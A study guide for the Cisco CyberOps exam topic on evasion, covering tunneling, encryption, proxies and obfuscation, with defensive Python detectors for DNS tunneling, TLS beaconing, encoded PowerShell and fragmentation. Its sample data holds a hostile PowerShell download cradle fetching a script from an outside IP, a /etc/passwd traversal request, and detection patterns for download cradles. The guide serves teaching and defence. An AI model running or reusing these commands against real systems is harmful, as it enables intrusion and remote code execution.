Describe evasion and obfuscation techniques, such as tunneling, encryption, and proxies

📘Cisco Certified CyberOps Associate (200-201 CBROPS)


1. What Are Evasion and Obfuscation Techniques?

Evasion

Evasion means bypassing security controls so that malicious activity is not detected.

Attackers try to avoid:

  • Firewalls
  • Intrusion Detection Systems (IDS)
  • Intrusion Prevention Systems (IPS)
  • Endpoint Detection and Response (EDR)
  • Antivirus software
  • Web filters
  • SIEM monitoring systems

Obfuscation

Obfuscation means hiding or disguising malicious content so it looks harmless.

Instead of attacking directly, attackers:

  • Hide commands
  • Encrypt traffic
  • Modify malware code
  • Use legitimate services to carry malicious traffic

For the exam, remember:

Evasion = Avoiding detection
Obfuscation = Hiding the true purpose


2. Tunneling

What is Tunneling?

Tunneling is a technique where attackers encapsulate one kind of traffic inside another protocol that the network already permits.

It allows malicious traffic to:

  • Pass through firewalls that permit the outer protocol
  • Avoid content inspection, because the inspecting device sees only the carrier protocol
  • Bypass network restrictions such as port or destination filtering

It works by wrapping malicious traffic inside allowed traffic, so the inner traffic inherits the trust granted to the outer protocol.


Why Tunneling Works

Organizations often allow:

  • DNS traffic
  • HTTPS traffic
  • ICMP traffic
  • HTTP traffic

Attackers hide malicious communication inside these trusted protocols.


Common Tunneling Techniques

1. DNS Tunneling

DNS is almost always allowed outbound, even from hosts that have no other Internet access, and it is often not inspected.

Attackers:

  • Encode data inside DNS queries, usually as the subdomain labels of a domain they control
  • Let the normal resolver chain forward those queries to the attacker's authoritative DNS server, so the victim never connects to the attacker directly
  • Receive commands in DNS responses (for example in TXT, NULL or CNAME records)

This allows:

  • Data exfiltration
  • Command and control (C2) communication

Security analysts must monitor:

  • Unusually long or random-looking (high-entropy) subdomain labels
  • High volume of queries to a single domain, each with a different subdomain
  • High rates of unusual record types such as TXT or NULL
  • DNS requests to suspicious or newly registered domains
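The indicators above can be turned into a small detector. The following is an added example written for this page, not code from the exam guide: it parses a constructed DNS query log (the domain badexfil.net, the client addresses and the log format are all assumptions), groups queries by client and registered domain, and flags pairs that show several tunneling indicators at once: long labels, high-entropy labels, many unique subdomains, and a high share of TXT-type queries.

```python
import math
from collections import defaultdict

# Constructed DNS query log (hypothetical sample data, not real telemetry).
# Assumed format per line: "<timestamp> <client_ip> <qname> <qtype>"
# The hex-encoded labels under badexfil.net carry chunks of a stolen text file.
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 www.example.com A
2024-05-01T10:00:02Z 10.0.0.5 mail.example.com MX
2024-05-01T10:00:02Z 10.0.0.5 a1b2c3.cdn.example.org A
2024-05-01T10:00:03Z 10.0.0.7 4a6f686e20446f653b2070617373776f7264.t1.badexfil.net TXT
2024-05-01T10:00:03Z 10.0.0.7 3d2068756e74657232303234213b2069643d.t1.badexfil.net TXT
2024-05-01T10:00:04Z 10.0.0.7 31303031207c2069703d31302e302e302e37.t1.badexfil.net TXT
2024-05-01T10:00:04Z 10.0.0.7 207c2075736572733d726f6f742c6a646f65.t1.badexfil.net TXT
2024-05-01T10:00:05Z 10.0.0.7 www.example.com A
"""

# Thresholds are illustrative starting points, not vendor-tuned values.
MAX_NORMAL_LABEL_LEN = 30      # hostname labels this long are rare outside tunnels
MIN_SUSPICIOUS_ENTROPY = 3.0   # bits per character; encoded data looks random
MIN_UNIQUE_SUBDOMAINS = 3      # a tunnel needs a fresh subdomain for every chunk
MIN_RULES_TO_FLAG = 2          # require more than one indicator to cut noise


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for empty or uniform strings)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_domain(qname: str):
    """Return (registered_domain, subdomain_labels).

    Simplification: the registered domain is taken as the last two labels.
    A production detector would consult the Public Suffix List so that names
    such as host.example.co.uk are grouped correctly.
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), []
    return ".".join(labels[-2:]), labels[:-2]


def parse_dns_log(text: str):
    """Yield (client_ip, qname, qtype) tuples from the assumed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash the detector
        _ts, client, qname, qtype = parts
        yield client, qname, qtype.upper()


def suspicious_tunnels(text: str):
    """Return [(client_ip, registered_domain, [reasons])] for flagged pairs."""
    stats = defaultdict(lambda: {"queries": 0, "txt_like": 0,
                                 "subdomains": set(), "longest_label": ""})
    for client, qname, qtype in parse_dns_log(text):
        domain, sub_labels = split_domain(qname)
        s = stats[(client, domain)]
        s["queries"] += 1
        if qtype in ("TXT", "NULL", "CNAME"):  # record types that carry large answers
            s["txt_like"] += 1
        if sub_labels:
            s["subdomains"].add(".".join(sub_labels))
            longest = max(sub_labels, key=len)
            if len(longest) > len(s["longest_label"]):
                s["longest_label"] = longest

    findings = []
    for (client, domain), s in stats.items():
        reasons = []
        label = s["longest_label"]
        if len(label) >= MAX_NORMAL_LABEL_LEN:
            reasons.append("long-label")
        if shannon_entropy(label) >= MIN_SUSPICIOUS_ENTROPY:
            reasons.append("high-entropy-label")
        if len(s["subdomains"]) >= MIN_UNIQUE_SUBDOMAINS:
            reasons.append("many-unique-subdomains")
        if s["queries"] >= 3 and s["txt_like"] / s["queries"] >= 0.5:
            reasons.append("txt-heavy")
        if len(reasons) >= MIN_RULES_TO_FLAG:
            findings.append((client, domain, reasons))
    return findings


if __name__ == "__main__":
    for client, domain, reasons in suspicious_tunnels(SAMPLE_DNS_LOG):
        print(f"{client} -> {domain}: {', '.join(reasons)}")
```

Requiring two independent indicators is what keeps content-delivery networks and cloud providers, which legitimately use many short random-looking subdomains, from flooding the queue; a single long label or a single TXT query is not enough on its own.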

2. HTTP/HTTPS Tunneling

Attackers hide malicious traffic inside web traffic.

Because HTTPS is encrypted:

  • Security tools cannot inspect the content without TLS interception
  • Malware communicates with C2 servers over HTTPS on port 443, blending in with normal web browsing

For the exam:

  • HTTPS is commonly abused
  • Encrypted web traffic can hide malware traffic

3. ICMP Tunneling

ICMP is used for network diagnostics (like ping).

Attackers:

  • Hide data inside ICMP packets
  • Use ping traffic for communication

Security teams should monitor:

  • Large or non-standard ICMP payloads (a default ping carries only 32 or 56 bytes of data)
  • Frequent or sustained ICMP traffic to a single external host
  • Echo requests whose payloads change on every packet instead of repeating the usual ping pattern

Exam Tip

If a question says:

“Data is being transferred through DNS queries”

The answer is likely:

DNS tunneling


3. Encryption as an Evasion Technique

What is Encryption?

Encryption converts readable data (plaintext) into ciphertext that cannot be read without the key.

It is normally used for:

  • Secure communication
  • Protecting sensitive data

But attackers also use encryption to:

  • Hide malware communication
  • Avoid detection by IDS/IPS

How Attackers Use Encryption

1. Encrypted Command and Control (C2)

Malware communicates with attacker servers using:

  • HTTPS (HTTP carried over TLS), indistinguishable from web browsing at the network level
  • TLS on other ports, or custom encryption inside otherwise ordinary-looking protocols
  • Encrypted messaging protocols

Security devices cannot inspect encrypted payloads without TLS inspection (decrypting at a proxy or firewall that presents an internally trusted certificate to the client).


2. File Encryption

Attackers may:

  • Encrypt or pack malware payloads
  • Encrypt scripts
  • Encrypt droppers

The file on disk no longer matches known signatures, so static antivirus scanning misses it. The payload still has to be decrypted in memory before it can run, which is why behavioural detection and memory scanning by EDR can still catch it.


3. Full Payload Encryption

Some malware encrypts:

  • Entire communication sessions
  • Data exfiltration traffic

Content inspection is then impossible, and detection has to rely on metadata: destination, timing, volume, and certificate properties.


Detection Methods

Security analysts use:

  • SSL/TLS inspection (decryption at a proxy or next-generation firewall, where policy and privacy rules permit it)
  • Traffic pattern analysis, such as connections that recur at fixed intervals (beaconing) or always carry the same number of bytes
  • Behavioral detection on the endpoint
  • Certificate inspection (self-signed, default or mismatched subject names, very recently issued certificates, missing SNI)
  • Monitoring unusual encrypted outbound traffic, for example TLS to a bare IP address with no hostname, or to a destination nobody else in the organization contacts
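Traffic pattern analysis and certificate inspection work on metadata that survives encryption, so they can be shown without any decryption at all. The following is an added example written for this page (not code from the exam guide or any product) that runs over a constructed table of TLS connection metadata, in the spirit of what a flow collector or Zeek's conn and ssl logs provide; the addresses, timestamps, certificate names and byte counts are all sample data. It flags a source/destination pair when the connections recur at a near-constant interval, carry the same request size every time, use a self-signed certificate, or omit the Server Name Indication.

```python
import csv
import io
import statistics
from collections import defaultdict

# Constructed TLS connection metadata (sample data, not real traffic).
# 10.0.0.5 browses normally; 10.0.0.7 checks in with 203.0.113.10 every ~60 s.
SAMPLE_FLOWS = """\
ts,src,dst,dport,sni,cert_subject,cert_issuer,bytes_out,bytes_in
1714557600,10.0.0.5,198.51.100.20,443,www.example.com,CN=www.example.com,CN=Example Public CA,1834,52011
1714557777,10.0.0.5,198.51.100.21,443,cdn.example.net,CN=*.example.net,CN=Example Public CA,902,214455
1714558900,10.0.0.5,198.51.100.20,443,www.example.com,CN=www.example.com,CN=Example Public CA,1700,48020
1714560000,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
1714560059,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
1714560120,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,290
1714560180,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
1714560239,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
1714560300,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,292
1714560360,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
1714560419,10.0.0.7,203.0.113.10,443,,CN=localhost,CN=localhost,412,288
"""

MIN_CONNECTIONS = 6      # enough samples to judge regularity
MAX_BEACON_CV = 0.2      # stdev/mean of the gaps; jittered C2 still stays low
MIN_RULES_TO_FLAG = 2    # one indicator alone is too noisy


def interval_cv(timestamps):
    """Coefficient of variation (stdev/mean) of the gaps between connections.
    Near 0 means metronomic; human browsing is normally well above 1."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    return statistics.pstdev(gaps) / mean if mean else None


def find_beacons(flow_csv: str):
    """Return {(src, dst): {...}} for pairs showing several C2-like traits."""
    by_pair = defaultdict(list)
    for row in csv.DictReader(io.StringIO(flow_csv)):
        by_pair[(row["src"], row["dst"])].append(row)

    findings = {}
    for pair, rows in by_pair.items():
        reasons = []
        cv = interval_cv(int(r["ts"]) for r in rows)
        if len(rows) >= MIN_CONNECTIONS and cv is not None and cv < MAX_BEACON_CV:
            reasons.append("regular-interval")
        if len(rows) >= MIN_CONNECTIONS and len({r["bytes_out"] for r in rows}) == 1:
            reasons.append("constant-request-size")
        if any(r["cert_subject"] == r["cert_issuer"] for r in rows):
            reasons.append("self-signed-cert")
        if any(not r["sni"] for r in rows):
            reasons.append("no-sni")
        if len(reasons) >= MIN_RULES_TO_FLAG:
            findings[pair] = {"connections": len(rows), "interval_cv": cv,
                              "reasons": reasons}
    return findings


if __name__ == "__main__":
    for (src, dst), info in find_beacons(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: {info['connections']} connections, "
              f"interval CV={info['interval_cv']:.3f}, {', '.join(info['reasons'])}")
```

Nothing in this check needs the plaintext; the interval regularity and the constant request size come from the flow record, and the certificate fields are visible in the handshake (for TLS 1.2 and for any TLS 1.3 server that does not use encrypted certificates). That is the practical answer to "how do you detect it if you cannot decrypt it".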

Exam Tip

If malware traffic is hidden using HTTPS:

  • This is encryption-based evasion
  • Security controls must either decrypt the traffic (TLS inspection) or detect it from metadata and endpoint behavior

4. Proxies

What is a Proxy?

A proxy server acts as a middle system between client and destination server.

Instead of connecting directly:

  • The user connects to the proxy
  • The proxy forwards the traffic

Attackers use proxies to:

  • Hide their real IP address
  • Avoid being traced
  • Bypass IP-based blocking

Types of Proxies Used in Attacks

1. Anonymous Proxies

Hide the attacker’s IP address.

2. Open Proxies

Public proxy servers anyone can use.

3. Compromised Proxy Servers

Attackers route traffic through systems they have already compromised (for example botnet nodes), so the victim sees the relay's address rather than the attacker's.


Reverse Proxies

Used by attackers as redirectors in front of their real infrastructure, to:

  • Hide command-and-control infrastructure: implants connect to the redirector, which forwards the traffic to the real C2 server
  • Protect attacker servers from being directly identified, so that blocking or seizing a redirector does not expose the back end

Proxy Chaining

Attackers may use:

  • Multiple proxies in sequence, often in different countries and jurisdictions

This makes tracing extremely difficult, because every hop has to be unwound with the cooperation of that hop's operator.


Detection Clues

Security analysts may notice:

  • Suspicious outbound connections
  • Connections to known proxy services, anonymizing VPNs or Tor exit nodes
  • Source addresses from unexpected countries, or from hosting providers rather than residential or corporate networks
  • High traffic to uncommon destinations

5. Other Obfuscation Techniques You Should Know for the Exam

Although the exam topic highlights tunneling, encryption, and proxies, the 200-201 exam may also include:


1. Code Obfuscation

Attackers modify malware code to avoid signature detection:

  • Rename variables and functions
  • Change bytes so the file hash no longer matches a known-bad hash
  • Insert junk code
  • Recompile or repack malware
  • Encode scripts, for example as Base64-encoded PowerShell commands

This helps malware avoid signature-based antivirus detection.


2. Polymorphic Malware

Changes its code every time it spreads, typically by re-encrypting the body with a new key and a new decryption stub.

Each infection looks different on disk, but the behaviour once it runs is the same, which is why behavioural detection still works.


3. Fileless Malware

Runs in memory instead of writing files to disk, typically by abusing PowerShell, WMI or a script engine, or by injecting into a legitimate process.

Harder to detect with traditional file-scanning antivirus; memory analysis and script logging are needed.


4. Living off the Land (LotL)

Attackers use legitimate tools already present on the system, such as:

  • PowerShell
  • WMI
  • Other built-in system tools (for example certutil, mshta, rundll32 and bitsadmin)

This blends malicious activity with normal operations, because the tools themselves are signed and trusted; detection has to focus on how they are invoked (parent process, command-line arguments, encoding).
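Code obfuscation (the encoded scripts from the section above) and living off the land come together in the single most common case an analyst sees: an Office document spawning powershell.exe with a Base64-encoded command. The following is an added example written for this page, not code from the exam guide, showing the triage logic over constructed process-creation events (the hostnames, parent process names and command lines are sample data; the Base64 blobs are generated inside the block so the reader can see what they decode to). It decodes the -EncodedCommand argument (UTF-16LE text, Base64-encoded), undoes the simple string-concatenation trick, and scores the result.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the argument is Base64 of the UTF-16LE script text. Longest
# prefixes are tried first so the regex does not stop at "-e" prematurely.
_ENC_PREFIXES = sorted(("encodedcommand"[:i] for i in range(1, 15)), key=len, reverse=True)
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE)

# Patterns typical of download cradles and defence-evasion switches (matched
# against the lower-cased, de-obfuscated command line plus decoded script).
SUSPICIOUS_PATTERNS = {
    "invoke-expression": r"\b(?:iex|invoke-expression)\b",
    "web-download": r"\b(?:downloadstring|downloadfile|invoke-webrequest)\b",
    "webclient": r"net\.webclient",
    "base64-decode": r"frombase64string",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "no-profile": r"-nop(?:rofile)?\b",
    "bypass-policy": r"-e(?:xecutionpolicy|x|p)\s+bypass",
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
FLAG_SCORE = 3


def _enc(script: str) -> str:
    """Encode a script the way an attacker would for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events (sample data; ccmexec.exe is assumed to
# be a management agent that legitimately runs encoded commands).
SAMPLE_EVENTS = [
    {"host": "WS-0142", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
    {"host": "WS-0142", "parent": "ccmexec.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -enc "
                + _enc("Get-Date | Out-File C:\\Temp\\last-run.txt")},
    {"host": "WS-0077", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -e "
                + _enc("IEX (New-Object Net.WebClient).('Downlo'+'adString')('http://203.0.113.10/a.ps1')")},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None   # not really an encoded command (e.g. "-e" used for something else)


def deobfuscate(script: str) -> str:
    """Undo the string-concatenation trick: 'Downlo'+'adString' -> 'DownloadString'."""
    return re.sub(r"['\"]\s*\+\s*['\"]", "", script)


def triage(event: dict) -> dict:
    """Score one process-creation event; flag it when the score reaches FLAG_SCORE."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    effective = cmd + ("\n" + decoded if decoded else "")
    normalized = deobfuscate(effective).lower()
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, normalized)]
    score = len(hits) + (1 if decoded else 0)        # encoding itself is mildly suspicious
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office-parent")                 # Office should not spawn PowerShell
        score += 2
    return {"host": event["host"], "parent": event["parent"], "decoded": decoded,
            "hits": hits, "score": score, "flag": score >= FLAG_SCORE}


if __name__ == "__main__":
    for r in (triage(e) for e in SAMPLE_EVENTS):
        print(f"{r['host']} parent={r['parent']} score={r['score']} flag={r['flag']} hits={r['hits']}")
        if r["decoded"]:
            print("   decoded:", deobfuscate(r["decoded"]))
```

The scoring deliberately does not treat "encoded command" as malicious by itself: management agents and scheduled tasks use it all the time, which is why the second event stays below the threshold while the Word-spawned download cradle scores well above it.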


5. Traffic Fragmentation

Attackers split a malicious payload across many IP fragments or TCP segments so that no single packet contains the complete signature string.

This:

  • Confuses signature-based IDS that inspects packets one at a time without reassembling them
  • Bypasses detection rules that expect the whole pattern inside one packet

Sensors must reassemble fragments and TCP streams before matching. Overlapping fragments that carry conflicting data are a further trick, exploiting differences between how the sensor and the target host reassemble them.
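The difference between a sensor that inspects packets individually and one that reassembles first is easy to show. The following is an added example written for this page (not code from the exam guide or any IDS): it cuts a constructed attack request into fixed-size fragments, delivers them out of order, and compares a naive per-fragment scan with a scan over the reassembled stream. The request, the signature string and the fragment size are assumptions for the example.

```python
import random

SIGNATURE = b"/etc/passwd"   # the byte pattern a signature rule looks for

# Constructed attack request (sample data); the traversal is what a rule matches.
ATTACK_REQUEST = (b"GET /cgi-bin/view.cgi?file=../../../../etc/passwd HTTP/1.1\r\n"
                  b"Host: intranet.example.com\r\n\r\n")


def fragment(data: bytes, size: int):
    """Split `data` into (offset, chunk) pairs, as IP fragmentation or TCP
    segmentation would; the caller may deliver them in any order."""
    return [(off, data[off:off + size]) for off in range(0, len(data), size)]


def scan_each_fragment(frags, signature=SIGNATURE) -> bool:
    """Naive sensor: inspects every fragment on its own."""
    return any(signature in chunk for _off, chunk in frags)


def reassemble(frags, total_len):
    """Rebuild the stream from fragments in any order. `total_len` is what the
    last fragment (MF flag clear) declares. Returns None while a gap remains,
    because scanning an incomplete buffer can miss or mis-attribute data.
    Overlapping fragments are resolved last-writer-wins here; real hosts differ
    on this, which is exactly what overlap-based evasion exploits."""
    buf = bytearray(total_len)
    have = bytearray(total_len)   # coverage map: 1 where a byte has arrived
    for off, chunk in frags:
        end = off + len(chunk)
        if end > total_len:
            raise ValueError("fragment exceeds declared length")
        buf[off:end] = chunk
        have[off:end] = b"\x01" * len(chunk)
    return bytes(buf) if all(have) else None


def scan_reassembled(frags, total_len, signature=SIGNATURE) -> bool:
    """Sensor that reassembles first, as stream-aware IDS engines do."""
    stream = reassemble(frags, total_len)
    return stream is not None and signature in stream


if __name__ == "__main__":
    frags = fragment(ATTACK_REQUEST, 16)
    random.shuffle(frags)
    print("per-fragment match :", scan_each_fragment(frags))
    print("reassembled match  :", scan_reassembled(frags, len(ATTACK_REQUEST)))
```

With 16-byte fragments the signature straddles a boundary ("/../../etc/passw" in one fragment, "d HTTP/1.1" in the next), so the per-fragment scan reports nothing while the reassembled scan fires; dropping any one fragment leaves a gap and the reassembling sensor correctly refuses to give a verdict on an incomplete stream.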

6. How Security Analysts Detect Evasion Techniques

For the exam, you must understand defensive methods.

Detection Techniques Include:

  • Network traffic analysis
  • Deep packet inspection (DPI)
  • Behavioral analysis
  • Anomaly detection
  • SSL/TLS inspection
  • DNS logging and monitoring
  • Proxy log analysis
  • SIEM correlation

7. Key Differences Summary

Technique   | Purpose       | How It Works
------------|---------------|---------------------------------------------------------
Tunneling   | Hide traffic  | Encapsulate malicious traffic inside an allowed protocol
Encryption  | Hide content  | Make data unreadable to inspection tools
Proxy       | Hide source   | Use an intermediary system to mask the attacker's IP

8. Exam-Focused Scenarios to Recognize

You should be able to identify:

  • Data hidden in DNS queries → DNS tunneling
  • Malware using HTTPS for C2 → Encrypted communication
  • Attacker IP cannot be traced → Proxy usage
  • Malware code constantly changes → Polymorphic malware
  • Suspicious traffic over allowed protocol → Tunneling

9. Important Analyst Responsibilities

As a security analyst, you must:

  • Monitor encrypted outbound traffic
  • Inspect DNS logs regularly
  • Identify unusual traffic patterns
  • Correlate logs in SIEM
  • Implement TLS inspection where policy and privacy rules permit
  • Block known malicious proxy services
  • Enforce egress filtering

10. Final Exam Summary (Must Remember)

Evasion and obfuscation techniques are methods attackers use to:

  • Avoid detection
  • Hide malicious traffic
  • Bypass security controls
  • Blend into normal network activity

The three major ones covered here:

  1. Tunneling – Hiding malicious traffic inside allowed protocols
  2. Encryption – Making malicious traffic unreadable
  3. Proxies – Hiding attacker identity

For the exam:

  • Focus on recognizing patterns
  • Understand how they bypass detection
  • Know how analysts detect and respond